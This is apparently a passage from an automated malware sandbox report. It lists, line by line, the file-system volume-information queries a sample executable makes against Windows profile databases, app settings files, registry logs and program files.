Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PreSignInSettingsConfig[1].json VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PreSignInSettingsConfig[1].json VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.29e797f3.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.3ce67b09.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.0eee61ec.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.45e00f56.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.a3fa76ae.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.5eee580c.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.e1dabada.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoIt3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoIt3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\HBtOiGTydevkvzVRvQJUwbiCuytmjHecpAIAwZYkf\UDeJwCQCrZFLkCPQcRnwCrmLG.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\HBtOiGTydevkvzVRvQJUwbiCuytmjHecpAIAwZYkf\UDeJwCQCrZFLkCPQcRnwCrmLG.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_helper.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\resources.pak VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msvcp140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msvcp140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\FileSyncShell64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\FileSyncShell64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
